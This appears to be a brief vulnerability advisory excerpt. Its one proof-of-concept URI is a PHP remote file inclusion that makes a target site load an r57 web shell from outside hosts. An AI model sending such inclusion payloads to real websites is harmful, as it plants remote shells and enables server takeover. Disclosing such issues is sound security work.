An attacker can exploit this issue via a browser.
The following proof-of-concept URI is available:
http://www.example.com/index.php?page=http://www.example2.com/r57.txt?http://www.goodayelinks.com/index.php?page=http://www.nykola.ch/Sefirot_r0x/r57.txt?
暂无评论